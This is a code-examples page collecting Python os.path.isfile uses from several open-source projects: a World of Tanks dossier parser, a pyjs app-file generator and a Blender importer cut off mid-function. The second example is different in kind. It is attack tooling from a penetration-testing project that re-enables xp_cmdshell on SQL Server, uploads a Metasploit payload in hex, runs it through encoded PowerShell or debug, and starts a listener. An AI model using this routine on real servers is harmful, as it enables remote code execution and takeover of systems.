os.path.isfile

Here are the examples of the python api os.path.isfile taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples 7

Example 1

View license
def main():
	
	import struct, json, time, sys, os, shutil, datetime, base64

	parserversion = "0.9.12.0"
	
	global rawdata, tupledata, data, structures, numoffrags
	global filename_source, filename_target
	global option_server, option_format, option_tanks
	
	filename_source = ""
	option_raw = 0
	option_format = 0
	option_server = 0
	option_frags = 1
	option_tanks = 0
	
	for argument in sys.argv[1:]:
		if argument == "-s":
			option_server = 1
			#print '-- SERVER mode enabled'
		elif argument == "-r":
			option_raw = 1
			#print '-- RAW mode enabled'
		elif argument == "-f":
			option_format = 1
			#print '-- FORMAT mode enabled'
		elif argument == "-k":
			option_frags = 0
			#print '-- FRAGS will be excluded'
		elif argument == "-t":
			option_tanks = 1
			#print '-- TANK info will be included'
		else:
			# dossier file, if more than one get only first
			if filename_source =='' and os.path.isfile(argument):
				filename_source = argument
	
	if filename_source == "":
		usage()
		sys.exit(2)
		
	printmessage('############################################')
	printmessage('###### WoTDC2J ' + parserversion)
	

	printmessage('Processing ' + filename_source)
	

	if not os.path.exists(filename_source) or not os.path.isfile(filename_source) or not os.access(filename_source, os.R_OK):
		catch_fatal('Dossier file does not exists')
		sys.exit(1)

	if os.path.getsize(filename_source) == 0:
		catch_fatal('Dossier file size is zero')
		sys.exit(1)
		
	filename_target = os.path.splitext(filename_source)[0]
	filename_target = filename_target + '.json'

	if os.path.exists(filename_target) and os.path.isfile(filename_target) and os.access(filename_target, os.R_OK):
		try:
			os.remove(filename_target)
		except:
			catch_fatal('Cannot remove target file ' + filename_target)

			
	cachefile = open(filename_source, 'rb')

	try:
		from SafeUnpickler import SafeUnpickler
		dossierversion, dossierCache = SafeUnpickler.load(cachefile)
	except Exception, e:
		exitwitherror('Dossier cannot be read (pickle could not be read) ' + e.message)

	if not 'dossierCache' in locals():
		exitwitherror('Dossier cannot be read (dossierCache does not exist)')

	printmessage("Dossier version " + str(dossierversion))
	
	tankitems = [(k, v) for k, v in dossierCache.items()]

	dossier = dict()
		
	dossierheader = dict()
	dossierheader['dossierversion'] = str(dossierversion)
	dossierheader['parser'] = 'http://www.vbaddict.net'
	dossierheader['parserversion'] = parserversion
	dossierheader['tankcount'] = len(tankitems)
	

	
	base32name = "?;?"
	if option_server == 0:
		filename_base = os.path.splitext(os.path.basename(filename_source))[0]
		try:
			base32name = base64.b32decode(filename_base)
		except Exception, e:
			pass
			#printmessage('cannot decode filename ' + filename_base + ': ' + e.message)


	dossierheader['server'] = base32name.split(';', 1)[0];
	dossierheader['username'] = base32name.split(';', 1)[1];
	
	
	if option_server == 0:
		dossierheader['date'] = time.mktime(time.localtime())
	
	tanksdata = load_tanksdata()
	structures = load_structures()
	
	tanks = dict()
	tanks_v2 = dict()
	
	battleCount_15 = 0
	battleCount_7 = 0
	battleCount_historical = 0
	battleCount_company = 0
	battleCount_clan = 0
	battleCount_fortBattles = 0
	battleCount_fortSorties = 0
	battleCount_rated7x7 = 0
	battleCount_globalMap = 0
	battleCount_fallout = 0
	
	for tankitem in tankitems:
		
		if len(tankitem) < 2:
			printmessage('Invalid tankdata')
			continue

		if len(tankitem[0]) < 2:
			printmessage('Invalid tankdata')
			continue
			
		rawdata = dict()
		
		try:
			data = tankitem[1][1]
		except Exception, e:
			printmessage('Invalid tankitem ' + str(e.message))
			continue
			
		tankstruct = str(len(data)) + 'B'
		tupledata = struct.unpack(tankstruct, data)
		tankversion = getdata("tankversion", 0, 1)
		
		#if tankversion != 87:
		#printmessage("Tankversion " + str(tankversion))
		#	continue
		
		if tankversion not in structures:
			write_to_log('unsupported tankversion ' + str(tankversion))
			continue				

		if not isinstance(tankitem[0][1], (int)):
			printmessage('Invalid tankdata')
			continue
	
		try:
			tankid = tankitem[0][1] >> 8 & 65535
		except Exception, e:
			printmessage('cannot get tankid ' + e.message)
			continue
						
		try:
			countryid = tankitem[0][1] >> 4 & 15
		except Exception, e:
			printmessage('cannot get countryid ' + e.message)
			continue
			
		#For debugging purposes
		#if not (countryid==4 and tankid==19):
		#	continue
		
		for m in xrange(0,len(tupledata)):
			rawdata[m] = tupledata[m]
		
		if len(tupledata) == 0:
			continue

		if option_server == 0:
			tanktitle = get_tank_data(tanksdata, countryid, tankid, "title")
		else:
			tanktitle = str(countryid) + '_' + str(tankid)

		fragslist = []
		if tankversion >= 65:
			tank_v2 = dict()
			
			if tankversion == 65:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7')
				
			if tankversion == 69:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7')

			if tankversion == 77:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical')

			if tankversion == 81:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements')

			if tankversion in [85, 87]:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements')

			if tankversion in [88,89]:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7')

			if tankversion == 92:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon', 'maxGlobalMapCommon')
			
			if tankversion == 94:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon', 'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements')
				
			blockcount = len(list(blocks))+1

			newbaseoffset = (blockcount * 2)
			header = struct.unpack_from('<' + 'H' * blockcount, data)
			blocksizes = list(header[1:])
			blocknumber = 0
			numoffrags_list = 0
			numoffrags_a15x15 = 0
			numoffrags_a7x7 = 0
			numoffrags_historical = 0
			numoffrags_fortBattles = 0
			numoffrags_fortSorties = 0
			numoffrags_rated7x7 = 0
			numoffrags_globalMap = 0
			numoffrags_fallout = 0

			for blockname in blocks:

				if blocksizes[blocknumber] > 0:
					if blockname == 'frags':
						if option_frags == 1:
							fmt = '<' + 'IH' * (blocksizes[blocknumber]/6)
							fragsdata = struct.unpack_from(fmt, data, newbaseoffset)
							index = 0

							for i in xrange((blocksizes[blocknumber]/6)):
								compDescr, amount = (fragsdata[index], fragsdata[index + 1])
								numoffrags_list += amount	
								frag_countryid, frag_tankid, frag_tanktitle = get_tank_details(compDescr, tanksdata)
								tankfrag = [frag_countryid, frag_tankid, amount, frag_tanktitle]
								fragslist.append(tankfrag)
								index += 2							

							for i in xrange((blocksizes[blocknumber])):
								rawdata[newbaseoffset+i] = str(tupledata[newbaseoffset+i]) + " / Frags"
								
							tank_v2['fragslist'] = fragslist
				
						newbaseoffset += blocksizes[blocknumber] 

						
					else:
						oldbaseoffset = newbaseoffset
						structureddata = getstructureddata(blockname, tankversion, newbaseoffset)
						structureddata = keepCompatibility(structureddata)
						newbaseoffset = oldbaseoffset+blocksizes[blocknumber]
						tank_v2[blockname] = structureddata 

				blocknumber +=1
			if contains_block('max15x15', tank_v2):
				if 'maxXP' in tank_v2['max15x15']:
					if tank_v2['max15x15']['maxXP']==0:
						tank_v2['max15x15']['maxXP'] = 1
						
				if 'maxFrags' in tank_v2['max15x15']:
					if tank_v2['max15x15']['maxFrags']==0:
						tank_v2['max15x15']['maxFrags'] = 1

				
			if contains_block('company', tank_v2):
				if 'battlesCount' in tank_v2['company']:
					battleCount_company += tank_v2['company']['battlesCount']
			
			if contains_block('clan', tank_v2):
				if 'battlesCount' in tank_v2['clan']:
					battleCount_company += tank_v2['clan']['battlesCount']

			if contains_block('a15x15', tank_v2):
				
				if 'battlesCount' in tank_v2['a15x15']:
					battleCount_15 += tank_v2['a15x15']['battlesCount']
					
				if 'frags' in tank_v2['a15x15']:
					numoffrags_a15x15 = int(tank_v2['a15x15']['frags'])

			if contains_block('a7x7', tank_v2):
				
				if 'battlesCount' in tank_v2['a7x7']:
					battleCount_7 += tank_v2['a7x7']['battlesCount']
				
				if 'frags' in tank_v2['a7x7']:
					numoffrags_a7x7 = int(tank_v2['a7x7']['frags'])
			
			if contains_block('historical', tank_v2):
				
				if 'battlesCount' in tank_v2['historical']:
					battleCount_historical += tank_v2['historical']['battlesCount']
				
				if 'frags' in tank_v2['historical']:
					numoffrags_historical = int(tank_v2['historical']['frags'])

			if contains_block('fortBattles', tank_v2):
				
				if 'battlesCount' in tank_v2['fortBattles']:
					battleCount_fortBattles += tank_v2['fortBattles']['battlesCount']
				
				if 'frags' in tank_v2['fortBattles']:
					numoffrags_fortBattles = int(tank_v2['fortBattles']['frags'])
					
			if contains_block('fortSorties', tank_v2):
				
				if 'battlesCount' in tank_v2['fortSorties']:
					battleCount_fortSorties += tank_v2['fortSorties']['battlesCount']
				
				if 'frags' in tank_v2['fortSorties']:
					numoffrags_fortSorties = int(tank_v2['fortSorties']['frags'])

			if contains_block('rated7x7', tank_v2):
				
				if 'battlesCount' in tank_v2['rated7x7']:
					battleCount_rated7x7 += tank_v2['rated7x7']['battlesCount']
				
				if 'frags' in tank_v2['rated7x7']:
					numoffrags_rated7x7 = int(tank_v2['rated7x7']['frags'])
					
			if contains_block('globalMapCommon', tank_v2):
				
				if 'battlesCount' in tank_v2['globalMapCommon']:
					battleCount_globalMap += tank_v2['globalMapCommon']['battlesCount']
				
				if 'frags' in tank_v2['globalMapCommon']:
					numoffrags_globalMap = int(tank_v2['globalMapCommon']['frags'])
				
			if contains_block('fallout', tank_v2):
				
				if 'battlesCount' in tank_v2['fallout']:
					battleCount_fallout += tank_v2['fallout']['battlesCount']
				
				if 'frags' in tank_v2['fallout']:
					numoffrags_fallout = int(tank_v2['fallout']['frags'])
				
			if option_frags == 1:

				try:
					if numoffrags_list <> (numoffrags_a15x15 + numoffrags_a7x7 + numoffrags_historical + numoffrags_fortBattles + numoffrags_fortSorties + numoffrags_rated7x7 + numoffrags_globalMap + numoffrags_fallout):
						pass
						#write_to_log('Wrong number of frags for ' + str(tanktitle) + ', ' + str(tankversion) + ': ' + str(numoffrags_list) + ' = ' + str(numoffrags_a15x15) + ' + ' + str(numoffrags_a7x7) + ' + ' + str(numoffrags_historical) + ' + ' + str(numoffrags_fortBattles) + ' + ' + str(numoffrags_fortSorties) + ' + ' + str(numoffrags_rated7x7))
				except Exception, e:
						write_to_log('Error processing frags: ' + e.message)
		
			
				
			tank_v2['common'] = {"countryid": countryid,
				"tankid": tankid,
				"tanktitle": tanktitle,
				"compactDescr": tankitem[0][1],
				"type": get_tank_data(tanksdata, countryid, tankid, "type"),
				"premium": get_tank_data(tanksdata, countryid, tankid, "premium"),
				"tier": get_tank_data(tanksdata, countryid, tankid, "tier"),
				"updated": tankitem[1][0],
				"updatedR": datetime.datetime.fromtimestamp(int(tankitem[1][0])).strftime('%Y-%m-%d %H:%M:%S'),
				"creationTime": tank_v2['total']['creationTime'],
				"creationTimeR": datetime.datetime.fromtimestamp(int(tank_v2['total']['creationTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"lastBattleTime": tank_v2['total']['lastBattleTime'],
				"lastBattleTimeR": datetime.datetime.fromtimestamp(int(tank_v2['total']['lastBattleTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"basedonversion": tankversion,
				"frags":  numoffrags_a15x15,
				"frags_7x7":  numoffrags_a7x7,
				"frags_historical":  numoffrags_historical,
				"frags_fortBattles":  numoffrags_fortBattles,
				"frags_fortSorties":  numoffrags_fortSorties,
				"frags_compare": numoffrags_list,
				"has_15x15": contains_block("a15x15", tank_v2),
				"has_7x7": contains_block("a7x7", tank_v2),
				"has_historical": contains_block("historical", tank_v2),
				"has_clan": contains_block("clan", tank_v2),
				"has_company": contains_block("company", tank_v2),
				"has_fort": contains_block("fortBattles", tank_v2),
				"has_sortie": contains_block("fortSorties", tank_v2)
				
			}
			
			if option_raw == 1:
				tank_v2['rawdata'] = rawdata

			tanks_v2[tanktitle] = tank_v2
			
			
		if tankversion < 65:
			if tankversion >= 20:
				company = getstructureddata("company", tankversion)
				battleCount_company += company['battlesCount']
				clan = getstructureddata("clan", tankversion)
				battleCount_clan += clan['battlesCount']
			
			numoffrags = 0
	
			structure = getstructureddata("structure", tankversion)


			
			if 'fragspos' not in structure:
				write_to_log('tankversion ' + str(tankversion) + ' not in JSON')
				continue
			
			if option_frags == 1 and tankversion >= 17:
				fragslist = getdata_fragslist(tankversion, tanksdata, structure['fragspos'])
	
			tankdata = getstructureddata("tankdata", tankversion)
			battleCount_15 += tankdata['battlesCount']
	
			if not "creationTime" in tankdata:
				tankdata['creationTime'] = 1356998400
	
			common = {"countryid": countryid,
				"tankid": tankid,
				"tanktitle": tanktitle,
				"compactDescr": tankitem[0][1],
				"type": get_tank_data(tanksdata, countryid, tankid, "type"),
				"premium": get_tank_data(tanksdata, countryid, tankid, "premium"),
				"tier": get_tank_data(tanksdata, countryid, tankid, "tier"),
				"updated": tankitem[1][0],
				"updatedR": datetime.datetime.fromtimestamp(int(tankitem[1][0])).strftime('%Y-%m-%d %H:%M:%S'),
				"creationTime": tankdata['creationTime'],
				"creationTimeR": datetime.datetime.fromtimestamp(int(tankdata['creationTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"lastBattleTime": tankdata['lastBattleTime'],
				"lastBattleTimeR": datetime.datetime.fromtimestamp(int(tankdata['lastBattleTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"basedonversion": tankversion,
				"frags": tankdata['frags'],
				"frags_compare": numoffrags
			}
	
			if option_frags == 1 and tankversion >= 17:
				try:
					if tankdata['frags'] <> numoffrags:
						printmessage('Wrong number of frags!')
				except Exception, e:
						write_to_log('Error processing frags: ' + e.message)
	
			series = getstructureddata("series", tankversion)
	
			special = getstructureddata("special", tankversion)
	
			battle = getstructureddata("battle", tankversion)
	
			major = getstructureddata("major", tankversion)
	
			epic = getstructureddata("epic", tankversion)
	
	
	
			tank = dict()
			
			tank['tankdata'] = tankdata
			tank['common'] = common
	
			if tankversion >= 20:
				tank['series'] = series
				tank['battle'] = battle
				tank['special'] = special
				tank['epic'] = epic
				tank['major'] = major
				tank['clan'] = clan
				tank['company'] = company
				
			if option_frags == 1:
				tank['kills'] = fragslist
			
			if option_raw == 1:
				tank['rawdata'] = rawdata
			
			tanks[tanktitle] = tank
			#tanks = sorted(tanks.values())

	
	dossierheader['battleCount_15'] = battleCount_15	
	dossierheader['battleCount_7'] = battleCount_7
	dossierheader['battleCount_historical'] = battleCount_historical
	dossierheader['battleCount_company'] = battleCount_company
	dossierheader['battleCount_clan'] = battleCount_clan

	dossierheader['result'] = "ok"
	dossierheader['message'] = "ok"
	
	dossier['header'] = dossierheader
	dossier['tanks'] = tanks
	dossier['tanks_v2'] = tanks_v2

	dumpjson(dossier)

	printmessage('###### Done!')
	printmessage('')
	sys.exit(0)

Example 2

Project: pwn_plug_sources
Source File: mssql.py
View license
def deploy_hex2binary(ipaddr,port,username,password,option):
	# connect to SQL server
	target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
	setcore.PrintStatus("Connection established with SQL Server...")
	setcore.PrintStatus("Converting payload to hexadecimal...")
	# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
	if os.path.isfile("src/program_junk/set.payload"):
		web_path = ("src/program_junk/web_clone/")
	# then we are using metasploit
	if not os.path.isfile("src/program_junk/set.payload"):
                if operating_system == "posix":
                        web_path = ("src/program_junk")
                        subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
                        subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
	fileopen = file("%s/msf.exe" % (web_path), "rb")
	# read in the binary
	data = fileopen.read()
	# convert the binary to hex
	data = binascii.hexlify(data)
	# we write out binary out to a file
	filewrite = file("src/program_junk/payload.hex", "w")
	filewrite.write(data)
	filewrite.close()

	# if we are using metasploit, start the listener
	if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
                if operating_system == "posix":
                        import pexpect
        		meta_path = setcore.meta_path()
                	setcore.PrintStatus("Starting the Metasploit listener...")
                        child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))

	# random executable name
	random_exe = setcore.generate_random_string(10,15)

	#
	# next we deploy our hex to binary if we selected option 1 (powershell)
	#

	if option == "1":
		# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
		powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe))
	
		########################################################################################################################################################################################################
		#
		# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
		# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
		#
		########################################################################################################################################################################################################

		# blank command will store our fixed unicode variable
		blank_command = ""
		# loop through each character and insert null byte
		for char in powershell_command:
			# insert the nullbyte
			blank_command += char + "\x00"

		# assign powershell command as the new one
		powershell_command = blank_command
		# base64 encode the powershell command
		powershell_command = base64.b64encode(powershell_command)
		# this will trigger when we are ready to convert

	#
	# next we deploy our hex to binary if we selected option 2 (debug)
	#
	if option == "2":
		setcore.PrintStatus("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
		# reconfigure the stored procedure and re-enable
                try:
        		target_server.execute_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
	        	# need to do it a second time for some reason on 2005
		        target_server.execute_query("RECONFIGURE;")
                except: pass
		# we selected hex to binary
		fileopen = file("src/payloads/hex2binary.payload", "r")
		# specify random filename for deployment
		setcore.PrintStatus("Deploying initial debug stager to the system.")
		random_file = setcore.generate_random_string(10,15)
		for line in fileopen:
			# remove bogus chars
			line = line.rstrip()
			# make it printer friendly to screen
			print_line = line.replace("echo e", "")
			setcore.PrintStatus("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
			target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
		setcore.PrintStatus("Converting the stager to a binary...")
		# here we convert it to a binary
		target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
		setcore.PrintStatus("Conversion complete. Cleaning up...")
		# delete the random file
		target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))

	# here we start the conversion and execute the payload

	setcore.PrintStatus("Sending the main payload via to be converted back to a binary.")
	# read in the file 900 bytes at a time
	fileopen = file("src/program_junk/payload.hex", "r")
	#random_exe = setcore.generate_random_string(10,15)
	while fileopen:
		data = fileopen.read(900).rstrip()
		# if data is done then break out of loop because file is over
		if data == "": break			
		setcore.PrintStatus("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
		target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
	setcore.PrintStatus("Delivery complete. Converting hex back to binary format.")

	# if we are using debug conversion then convert our binary
	if option == "2":
		target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
		target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
		# clean up the old files
		setcore.PrintStatus("Cleaning up old files..")
		target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))

	# if we are using SET payload
	if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):	   
		setcore.PrintStatus("Spawning seperate child process for listener...")
                try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
        	except: pass
        	
		# start a threaded webserver in the background
		#import src.html.fasttrack_http_server
		subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
		#child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
		# grab the port options
		if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
			fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
			port = fileopen.read().rstrip()
		# if for some reason the port didnt get created we default to 443
		if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443
		# launch the python listener through pexpect
		# need to change the directory real quick
		os.chdir(definepath)
		#child2 = pexpect.spawn("python src/payloads/set_payloads/listener.py %s" % (port))
		# now back 
		os.chdir("src/program_junk/web_clone/")

	setcore.PrintStatus("Triggering payload stager...")
	# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified 
	import thread
	# execute the payload
	# we append more commands if option 1 is used
	if option == "1":
		random_exe_execute = random_exe
		random_exe = "powershell -EncodedCommand " + powershell_command

	sql_command = ("xp_cmdshell '%s'" % (random_exe))
	# start thread of SQL command that executes payload
	thread.start_new_thread(target_server.execute_query, (sql_command,))
	#time.sleep(5)
	time.sleep(1)
	# trigger the exe if option 1 is used
	if option == "1":
		sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
		thread.start_new_thread(target_server.execute_query, (sql_command,))
	# if pexpect doesnt exit right then it freaks out
	if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
        	os.system("python ../../payloads/set_payloads/listener.py")
	try:
		# interact with the child process through pexpect
		child2.interact()
		try:
        		os.remove("x")
        	except: pass
	except: pass

Example 3

Project: pyjs
Source File: browser.py
View license
    def _generate_app_file(self, platform):
        # TODO: cache busting
        template = self.read_boilerplate('all.cache.html')
        name_parts = [self.top_module, platform, 'cache.html']
        done = self.done[platform]
        len_ouput_dir = len(self.output)+1

        app_name = self.top_module
        platform_name = platform.lower()
        dynamic = 0,
        app_headers = ''
        available_modules = self.unique_list_values(self.visited_modules[platform])
        early_static_app_libs = [] + self.early_static_app_libs
        static_app_libs = []
        dynamic_app_libs = []
        dynamic_js_libs = [] + self.dynamic_js_libs
        static_js_libs = [] + self.static_js_libs
        early_static_js_libs = [] + self.early_static_js_libs
        late_static_js_libs = [] + self.late_static_js_libs
        dynamic_modules = []
        not_unlinked_modules = [re.compile(m[1:]) for m in self.unlinked_modules if m[0] == '!']
        for m in required_modules:
            not_unlinked_modules.append(re.compile('^%s$' % m))
        unlinked_modules = [re.compile(m) for m in self.unlinked_modules if m[0] != '!' and m not in not_unlinked_modules]

        def static_code(libs, msg = None):
            code = []
            for lib in libs:
                fname = lib
                if not os.path.isfile(fname):
                    fname = os.path.join(self.output, lib)
                if not os.path.isfile(fname):
                    raise RuntimeError('File not found %r' % lib)
                if fname[len_ouput_dir:] == self.output:
                    name = fname[len_ouput_dir:]
                else:
                    name = os.path.basename(lib)
                code.append('<script type="text/javascript"><!--')
                if not msg is None:
                    code.append("/* start %s: %s */" % (msg, name))
                f = file(fname)
                code.append(f.read())
                if not msg is None:
                    code.append("/* end %s */" % (name,))
                code.append("""--></script>""")
                self.remove_files[fname] = True
                fname = fname.split('.')
                if fname[-2] == '__%s__' % platform_name:
                    del fname[-2]
                    fname = '.'.join(fname)
                    if os.path.isfile(fname):
                        self.remove_files[fname] = True
            return "\n".join(code)

        def js_modname(path):
            return '[email protected]'+os.path.basename(path)+'.'+md5(path).hexdigest()

        def skip_unlinked(lst):
            new_lst = []
            pltfrm = '__%s__' % platform_name
            for path in lst:
                fname = os.path.basename(path).rpartition(pyjs.MOD_SUFFIX)[0]
                frags = fname.split('.')
                # TODO: do not combine module chunks until we write the file
                if self.cache_buster and len(frags[-1])==32 and len(frags[-1].strip('0123456789abcdef'))==0:
                    frags.pop()
                if frags[-1] == pltfrm:
                    frags.pop()
                fname = '.'.join(frags)
                in_not_unlinked_modules = False
                for m in not_unlinked_modules:
                    if m.match(fname):
                        in_not_unlinked_modules = True
                        new_lst.append(path)
                        break
                if not in_not_unlinked_modules:
                    in_unlinked_modules = False
                    for m in unlinked_modules:
                        if m.match(fname):
                            in_unlinked_modules = True
                            if fname in available_modules:
                                available_modules.remove(fname)
                    if not in_unlinked_modules:
                        new_lst.append(path)
            return new_lst

        if self.multi_file:
            dynamic_js_libs = self.unique_list_values(dynamic_js_libs + [m for m in list(self.js_libs) if not m in static_js_libs])
            dynamic_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])
        else:
            static_js_libs = self.unique_list_values(static_js_libs + [m for m in list(self.js_libs) if not m in dynamic_js_libs])
            static_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])

        dynamic_js_libs = skip_unlinked(dynamic_js_libs)
        dynamic_app_libs = skip_unlinked(dynamic_app_libs)
        static_js_libs = skip_unlinked(static_js_libs)
        static_app_libs = skip_unlinked(static_app_libs)

        dynamic_modules = self.unique_list_values(available_modules + [js_modname(lib) for lib in dynamic_js_libs])
        available_modules = self.unique_list_values(available_modules + early_static_app_libs + dynamic_modules)
        if len(dynamic_modules) > 0:
            dynamic_modules = "['" + "','".join(dynamic_modules) + "']"
        else:
            dynamic_modules = "[]"
        appscript = "<script><!--\n$wnd['__pygwt_modController']['init']($pyjs['appname'], window)\n$wnd['__pygwt_modController']['load']($pyjs['appname'], [\n'%s'\n])\n--></script>"
        jsscript = """<script type="text/javascript" src="%(path)s" onload="$pyjs['script_onload']('%(modname)s')" onreadystatechange="$pyjs['script_onreadystate']('%(modname)s')"></script>"""
        dynamic_app_libs = appscript % "',\n'".join([lib[len_ouput_dir:].replace('\\', '/') for lib in dynamic_app_libs])
        dynamic_js_libs = '\n'.join([jsscript % {'path': lib, 'modname': js_modname(lib)} for lib in dynamic_js_libs])
        early_static_app_libs = static_code(early_static_app_libs)
        static_app_libs = static_code(static_app_libs)
        early_static_js_libs = static_code(early_static_js_libs, "javascript lib")
        static_js_libs = static_code(static_js_libs, "javascript lib")
        late_static_js_libs = static_code(late_static_js_libs, "javascript lib")

        setoptions = "\n".join([("$pyjs['options']['%s'] = %s;" % (n, v)).lower() for n,v in self.runtime_options])

        file_contents = template % locals()
        if self.cache_buster:
            md5sum = md5(file_contents).hexdigest()
            name_parts.insert(2, md5sum)
        out_path = os.path.join(self.output, '.'.join((name_parts)))

        out_file = file(out_path, 'w')
        out_file.write(file_contents)
        out_file.close()
        return out_path

Example 4

Project: BlenderTools
Source File: pix.py
View license
def load(context, filepath):
    """

    :param context: Blender Context currently used for window_manager.update_progress and bpy_object_utils.object_data_add
    :type context: bpy.types.Context
    :param filepath: File path to be imported
    :type filepath: str
    :return: Return state statuses (Usually 'FINISHED')
    :rtype: dict
    """
    import time

    t = time.time()
    bpy.context.window.cursor_modal_set('WAIT')
    scs_globals = _get_scs_globals()
    lprint("", report_errors=-1, report_warnings=-1)  # Clear the 'error_messages' and 'warning_messages'

    collision_locators = []
    prefab_locators = []
    loaded_variants = []
    loaded_looks = []
    objects = []
    locators = []
    mats_info = []
    scs_root_object = skeleton = bones = armature = None

    # TRANSITIONAL STRUCTURES
    terrain_points = TerrainPntsTrans()

    # IMPORT PIP -> has to be loaded before PIM because of terrain points
    if scs_globals.import_pip_file:
        pip_filepath = str(filepath[:-1] + 'p')
        if os.path.isfile(pip_filepath):
            lprint('\nD PIP filepath:\n  %s', (pip_filepath,))
            # print('PIP filepath:\n  %s' % pip_filepath)
            result, prefab_locators = _pip.load(pip_filepath, terrain_points)
        else:
            lprint('\nI No PIP file.')
            # print('INFO - No PIP file.')

    # IMPORT PIM
    if scs_globals.import_pim_file or scs_globals.import_pis_file:
        if filepath:
            if os.path.isfile(filepath):
                lprint('\nD PIM filepath:\n  %s', (_path_utils.readable_norm(filepath),))
                result, objects, locators, armature, skeleton, mats_info = _pim.load(
                    context,
                    filepath,
                    terrain_points_trans=terrain_points
                )
                # print('  armature:\n%s\n  skeleton:\n%s' % (str(armature), str(skeleton)))
            else:
